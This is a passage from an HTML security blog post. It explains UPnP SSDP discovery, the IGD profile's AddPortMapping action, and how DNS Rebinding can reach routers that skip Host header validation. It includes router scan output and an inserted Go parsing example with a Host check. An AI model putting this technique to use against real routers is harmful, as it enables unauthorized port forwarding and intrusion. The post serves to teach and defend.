</span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; white-space: pre-wrap;">However, if you want to get your hands dirty in order to understand the UPnP protocol, just a few lines of code are necessary to perform the SSDP discovery.</span></p></span><p><span style="white-space: pre-wrap;"><span style="font-family: inherit;">The SSDP response contains information related to the location of the Device Description resource, which is usually pointed to by a URL inside the LOCATION response header.</span></span></p><span><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">As shown below, the Device Description is an XML document that contains information related to the device itself, such as the name of the device or details related to the manufacturer, together with the description of the services and actions exposed by the device.</span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: inherit; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span></p></span></div></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpL0nCClaAsNbXYSUQa2L-R-gY0N0O1dNfc-yzX98T-PEt2DMy42RgiUOXuPG1IAxRvxod11Mu1n23fMrpc9EjcK61eUG5IGXUQ7U04WDOEzD-EoIE3NGDeD29GFQgnRlueZ4tNmInTpAR/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="540" data-original-width="960" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjpL0nCClaAsNbXYSUQa2L-R-gY0N0O1dNfc-yzX98T-PEt2DMy42RgiUOXuPG1IAxRvxod11Mu1n23fMrpc9EjcK61eUG5IGXUQ7U04WDOEzD-EoIE3NGDeD29GFQgnRlueZ4tNmInTpAR/w640-h360/deviceDescription.png" width="640" /></a></div><p 
style="text-align: left;"><br /></p><p style="text-align: left;">In short, this XML file contains all the information we need in order to identify the available services.</p></div><div><h3 style="text-align: left;">The IGD Profile</h3><div style="text-align: left;"><p style="text-align: left;"></p><p style="text-align: justify;"><span style="font-family: inherit;">UPnP devices may implement custom profiles with custom services or use standard ones. <br /></span><span style="font-family: inherit;">A common profile used by many routers is the <b>IGD (Internet Gateway Device) profile</b>, which includes a set of sub-profiles related to the router configuration, such as “<i>LANHostConfigManagement</i>”, used for managing network configuration parameters, or “<i>WANIPConnection</i>” which, as already described in the “<a href="https://www.blackhat.com/presentations/bh-usa-08/Squire/BH_US_08_Squire_A_Fox_in_the_Hen_House%20White%20Paper.pdf" target="_blank">Universal Plug and Play IGD A Fox in the Hen House</a>” paper, exposes the “<i><b>AddPortMapping</b></i>” SOAP action, which is particularly interesting from an attacker's point of view.</span></p><p></p><p style="text-align: justify;">The “<b>AddPortMapping</b>” action is commonly used by other devices in the LAN to create new port mapping rules on the WAN interface of the router. 
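The parsing side of the discovery process described above (SSDP reply, LOCATION header, Device Description XML, SCPD action list), written out in Go as an added example. It is not the post's own scan script and not code from any project the post mentions. It runs offline on constructed sample documents (the addresses, paths and device names are made up; the XML shapes follow the UPnP device and service description schemas), so the network step of fetching LOCATION is left out, and it also includes the Host header check on a control endpoint that the DNS Rebinding section below identifies as the missing control:

```go
// Added example, not the post's own script: offline parsing of what a UPnP
// scan collects, plus the Host header check a control endpoint needs.
package main

import (
	"encoding/xml"
	"fmt"
	"net"
	"strings"
)

// Constructed SSDP reply; only the status line and LOCATION are used.
const sampleSSDP = "HTTP/1.1 200 OK\r\n" +
	"LOCATION: http://192.168.1.1:5431/igdevicedesc.xml\r\n" +
	"ST: urn:schemas-upnp-org:device:InternetGatewayDevice:1\r\n\r\n"

// Constructed Device Description; IGD nests WANIPConnection in an embedded device.
const sampleDesc = `<root xmlns="urn:schemas-upnp-org:device-1-0"><device>
<deviceType>urn:schemas-upnp-org:device:InternetGatewayDevice:1</deviceType>
<deviceList><device>
<deviceType>urn:schemas-upnp-org:device:WANConnectionDevice:1</deviceType>
<serviceList><service>
<serviceType>urn:schemas-upnp-org:service:WANIPConnection:1</serviceType>
<controlURL>/control/WANIPConnection</controlURL>
<SCPDURL>/upnp/WAN/wanipconnectionSCPD.xml</SCPDURL></service></serviceList>
</device></deviceList></device></root>`

// Constructed SCPD for WANIPConnection naming two of its standard actions.
const sampleSCPD = `<scpd xmlns="urn:schemas-upnp-org:service-1-0"><actionList>
<action><name>AddPortMapping</name></action>
<action><name>GetExternalIPAddress</name></action></actionList></scpd>`

// Tags without a namespace match the element in any namespace.
type Service struct {
	ServiceType string `xml:"serviceType"`
	ControlURL  string `xml:"controlURL"`
	SCPDURL     string `xml:"SCPDURL"`
}

type Device struct {
	DeviceType string    `xml:"deviceType"`
	Services   []Service `xml:"serviceList>service"`
	Devices    []Device  `xml:"deviceList>device"`
}

// allServices flattens the device tree so nested services are not missed.
func (d Device) allServices() []Service {
	out := append([]Service{}, d.Services...)
	for _, c := range d.Devices {
		out = append(out, c.allServices()...)
	}
	return out
}

// parseSSDP returns the headers of a 200 SSDP reply, names upper-cased.
func parseSSDP(reply string) (map[string]string, error) {
	lines := strings.Split(reply, "\r\n")
	if !strings.HasPrefix(lines[0], "HTTP/1.1 200") {
		return nil, fmt.Errorf("unexpected status line %q", lines[0])
	}
	h := map[string]string{}
	for _, l := range lines[1:] {
		if k, v, ok := strings.Cut(l, ":"); ok {
			h[strings.ToUpper(strings.TrimSpace(k))] = strings.TrimSpace(v)
		}
	}
	return h, nil
}

// listServices parses a Device Description (what LOCATION points at).
func listServices(desc string) ([]Service, error) {
	var root struct{ Device Device `xml:"device"` }
	if err := xml.Unmarshal([]byte(desc), &root); err != nil {
		return nil, err
	}
	return root.Device.allServices(), nil
}

// listActions parses a service's SCPD and returns its action names.
func listActions(scpd string) ([]string, error) {
	var s struct{ Actions []string `xml:"actionList>action>name"` }
	err := xml.Unmarshal([]byte(scpd), &s)
	return s.Actions, err
}

// hostAllowed is the check whose absence enables DNS Rebinding: accept only
// a Host header naming one of the device's own addresses on the UPnP port.
func hostAllowed(hostHeader string, own map[string]bool, port string) bool {
	h, p, err := net.SplitHostPort(hostHeader)
	return err == nil && p == port && own[h]
}

func main() {
	hdr, _ := parseSSDP(sampleSSDP)
	svcs, _ := listServices(sampleDesc)
	acts, _ := listActions(sampleSCPD)
	fmt.Println(hdr["LOCATION"], svcs, acts)
	fmt.Println(hostAllowed("192.168.1.1:5431", map[string]bool{"192.168.1.1": true}, "5431"))
}
```

Two points worth noticing. IGD services are nested (the scan output below shows WANIPConnection under WANConnectionDevice), so a parser that reads only the root device's serviceList misses exactly the service that exposes AddPortMapping. And hostAllowed refuses any Host header other than the device's own address and port, which is what makes a request arriving through a rebinding hostname fail instead of being treated as a LAN client.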
</p><p style="text-align: justify;">However, an attacker may <i>exploit this action to inject arbitrary rows</i> into the port forwarding table in order to forward traffic to other internal/external clients or to expose internal services externally, such as the router's web administration interface.</p><p style="text-align: justify;">As we saw from the discovery process, UPnP services can usually be exploited only if the attacker has access to the same local network as the target UPnP device.<br /></p><p style="text-align: justify;">Here comes the <i>DNS Rebinding technique to the rescue</i>!</p><p></p></div><h3 style="text-align: left;">Attacking Vulnerable UPnP Services via DNS Rebinding</h3><p></p></div><div><div style="text-align: left;"><span id="docs-internal-guid-b950de10-7fff-b8f2-b525-9669ddc8fca4"><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="white-space: pre-wrap;"><span style="font-family: inherit;">Therefore, it is now pretty clear why a router that implements the <b>IGD</b> profile and does not validate the Host header is a perfect target for a DNS Rebinding attack.</span></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="white-space: pre-wrap;"><span style="font-family: inherit;"><br /></span></span></p><p style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: left;"><span style="font-family: inherit;"><span style="white-space: pre-wrap;"></span></span></p><p style="text-align: justify;"><span style="font-family: inherit;"><span style="font-family: inherit;">Below is the <i>SSDP response</i> of a router with the UPnP <i>IGD profile <b>enabled</b></i>. 
The scan was performed using a custom Go script that performs the SSDP discovery process, reads the location of the Device Description resource and parses it in order to also list the services and actions available on the detected UPnP device. </span></span></p><p></p></span></div><div><div class="CodeMirror-activeline" style="background-color: #333333; box-sizing: border-box; color: #b8bfc6; font-family: Monaco, Consolas, "Andale Mono", "DejaVu Sans Mono", monospace; font-size: 14.4px; position: relative; text-align: left;"><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px; border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: inherit; font-family: inherit; font-size: inherit; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[<span class="cm-operator" style="box-sizing: border-box;">+</span>] Found Upnp device at <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">192</span>.168.1.1:1900</span></pre></div><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[<span class="cm-operator" style="box-sizing: border-box;">+</span>] Device Description (Location: 
http://192.168.1.1:5431/igdevicedesc.xml <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-</span>> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">200</span>)</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">PresentationURL: </span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">FriendlyName: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: 
border-box; padding-right: 0.1px;">Manufacturer: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ModelDescription: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ModelName: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">ModelNumber: [REDACTED]</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 
0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">[<span class="cm-operator" style="box-sizing: border-box;">+</span>] Getting devices list and related <span class="cm-builtin" style="box-sizing: border-box; color: #f3b3f8;">service</span> list</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">urn:schemas-upnp-org:device:InternetGatewayDevice:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" 
style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:Layer3Forwarding:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:Layer3Forwarding1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/Layer3Forwarding</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: 
relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/Layer3Forwarding</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/layer3forwardingSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 
0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetDefaultConnectionService</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetDefaultConnectionService</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 
0.1px;">urn:schemas-upnp-org:device:WANDevice:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceType: urn:schemas-upnp-org:service:WANCommonInterfaceConfig:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ServiceId: urn:upnp-org:serviceId:wancommoninterfaceconfig1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; 
white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> ControlURL: /control/WANCommonInterfaceConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> EventSubURL: /event/WANCommonInterfaceConfig</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SCPDURL: /upnp/WAN/wancommoninterfaceconfigSCPD.xml</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: 
border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> [<span class="cm-operator" style="box-sizing: border-box;">+</span>] Actions:</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> SetEnabledForInternet</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" 
style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetEnabledForInternet</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetCommonLinkProperties</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalBytesSent</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; 
break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalBytesReceived</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalPacketsSent</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-tab" cm-text=" " 
role="presentation" style="box-sizing: border-box;"> </span><span class="cm-tab" cm-text=" " role="presentation" style="box-sizing: border-box;"> </span> GetTotalPacketsReceived</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 0px; margin-top: 0px; overflow-wrap: break-word; overflow: visible; padding: 0px 4px; position: relative; white-space: pre-wrap; width: inherit; word-break: normal; z-index: 2;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">urn:schemas-upnp-org:device:WANConnectionDevice:1</span></pre><pre class="CodeMirror-line" role="presentation" style="background: 0px 0px rgb(51, 51, 51); border-bottom-width: 0px; border-left-width: 0px; border-radius: 0px; border-right: none; border-top-width: 0px; box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-family: inherit; font-size: 14.4px; margin-bottom: 